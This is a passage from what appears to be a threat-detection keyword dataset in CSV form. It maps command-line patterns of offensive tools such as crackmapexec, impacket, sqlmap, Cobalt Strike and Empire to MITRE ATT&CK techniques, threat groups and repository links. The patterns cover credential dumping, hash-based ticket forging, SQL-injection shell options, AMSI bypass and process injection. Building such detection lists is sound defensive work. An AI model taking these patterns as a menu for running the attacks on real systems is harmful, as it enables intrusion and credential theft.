-ntds ntds.dit.save -system system.save LOCAL*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* --ntds-history*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* --ntds-pwdLastSet*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -nthash * -domain-sid *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* -nthash * -spn * -domain-sid * -domain *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -nthash *-domain-sid S-1-5-11-39129514-1145628974-103568174 -domain*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* ntlm.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* ntlm.wordlist *--hex-wordlist*","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","0","N/A","10","10","18349","2660","2023-10-03T07:17:40Z","2015-12-04T14:46:51Z" +"* --ntlm-proxy-ip * --ntlm-proxy-port *","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","0","N/A","10","10","490","125","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" +"* ntlmrecon*","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Network Exploitation tools","https://github.com/pwnfoo/NTLMRecon","1","0","N/A","N/A","5","419","67","2023-08-31T05:39:48Z","2019-12-01T06:06:30Z" +"* NTLMv1 captured *","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","0","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"* ntlmv1.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* --nt-offsets *.csv*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" +"* ntp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ntp-monlist.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* nuages.formatImplantLastSeen*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"* NuagesImplant*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"* -o /share/payloads/*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"* -o cowroot*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/exrienz/DirtyCow","1","0","N/A","N/A","1","27","27","2018-07-23T02:07:24Z","2017-05-12T10:38:20Z" +"* -o ffuf.csv*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"* -oA icebreaker-scan*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"* --obfuscate *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* octopus.py*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" +"* -old-bloodhound*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"* omp2-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* omp2-enum-targets.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* omron-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --oneliner-nothidden*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* onesixtyone.c*","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","0","N/A","N/A","5","416","86","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z" +"* --only-abuse --dc-host *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* --only-known-exploit-paths*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"* openflow-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* openlookup-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* openvas-otp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* openwebnet-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* oracle-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* oracle-brute-stealth.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* oracle-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* oracle-sid-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* oracle-tns-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --os-bof*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* --os-cmd whoami*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* --os-pwn*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* --os-smbrelay*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* --outdir ldapdomaindump *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* --output rootDSEs.json --dump*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","61","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" +"* ovs-agent-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* owa * --user-as-pass *","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" +"* oxidfind -i *","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","0","N/A","10","10","269","49","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" +"* oxidfind -n *","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","0","N/A","10","10","269","49","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" +"* -p * --amsi-bypass *","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -p * -d *.dll -e OpenProcess*","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","0","N/A","10","6","553","55","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" +"* -p *\mimi.out*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"* -p 1337:1337 -p 5000:5000*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"* -p 4644 -n mal*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" +"* -p 'aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0'*","offensive_tool_keyword","ad-ldap-enum","An LDAP based Active Directory user and group enumeration tool","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","AD Enumeration","https://github.com/CroweCybersecurity/ad-ldap-enum","1","0","blank lmhash","6","3","290","72","2023-02-10T19:07:34Z","2015-08-25T19:38:39Z" +"* -p 